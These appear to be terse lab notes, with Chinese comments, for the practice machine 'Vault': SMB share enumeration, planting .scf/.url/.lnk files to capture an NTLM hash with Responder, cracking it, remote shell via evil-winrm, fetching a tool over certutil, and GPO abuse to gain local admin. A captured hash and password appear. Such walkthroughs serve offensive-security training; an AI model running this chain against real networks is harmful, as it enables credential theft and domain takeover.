nmap -O 192.168.162.172
//枚举GUEST用户可以使用的目录
smbmap -u GUEST -H 192.168.162.172
python3 hashgrab.py 192.168.45.212 test
smbclient \\\\192.168.162.172\\DocumentsShare -U GUEST
smb: \> put @test.scf
smb: \> put @test.url
smb: \> put test.lnk
responder -I tun0
结果
anirudh::VAULT:8f86997471383614:4B76E3A7DF0BF24945D0A85F4575DF13:010100000000000000FF17E898FAD90199787A61B1D7F0CF0000000002000800380043004600580001001E00570049004E002D005A0052003000440048004B004F004800460046004A0004003400570049004E002D005A0052003000440048004B004F004800460046004A002E0038004300460058002E004C004F00430041004C000300140038004300460058002E004C004F00430041004C000500140038004300460058002E004C004F00430041004C000700080000FF17E898FAD9010600040002000000080030003000000000000000010000000020000077EEB54469D1F6103BA0F72DC177ACE44970D6FADE091CA17405179482A7C5F20A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003200310032000000000000000000
hashcat -m 5600 -a 0 hashes.txt dict_big.txt --force
evil-winrm -u ANIRUDH -p SecureHM -i 192.168.162.172
获取shell
使用https://github.com/FuzzySecurity/StandIn/
原理: 通过工具枚举出当前用户在域控中的权限, 发现对域控有完全控制权限,然后将当前账号修改为本地管理员提权。
python3 -m http.server 8080
certutil.exe -urlcache -split -f http://192.168.45.166:8080/standin45.exe
*Evil-WinRM* PS C:\Users\anirudh\Desktop> .\StandIn_v13_Net45.exe --gpo
[?] Object : CN={6AC1786C-016F-11D2-945F-00C04fB984F9}
Path : LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
DisplayName : Default Domain Controllers Policy
CN : {6AC1786C-016F-11D2-945F-00C04fB984F9}
GPCFilesysPath : \\vault.offsec\sysvol\vault.offsec\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
GPCMachineExtensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
WhenCreated : 11/19/2021 8:50:33 AM
WhenChanged : 11/19/2021 8:50:33 AM
[?] Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vault,DC=offsec
DisplayName : Default Domain Policy
CN : {31B2F340-016D-11D2-945F-00C04FB984F9}
GPCFilesysPath : \\vault.offsec\sysvol\vault.offsec\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
GPCMachineExtensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
WhenCreated : 11/19/2021 8:50:33 AM
WhenChanged : 11/19/2021 9:00:32 AM
*Evil-WinRM* PS C:\Users\anirudh\Desktop> .\StandIn_v13_Net45.exe --gpo --filter "Default Domain Policy" --acl
[+] Account : VAULT\anirudh
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None
*Evil-WinRM* PS C:\Users\anirudh\Desktop> .\StandIn_v13_Net45.exe --gpo --filter "Default Domain Policy" --localadmin anirudh
*Evil-WinRM* PS C:\Users\anirudh\Desktop> gpupdate /force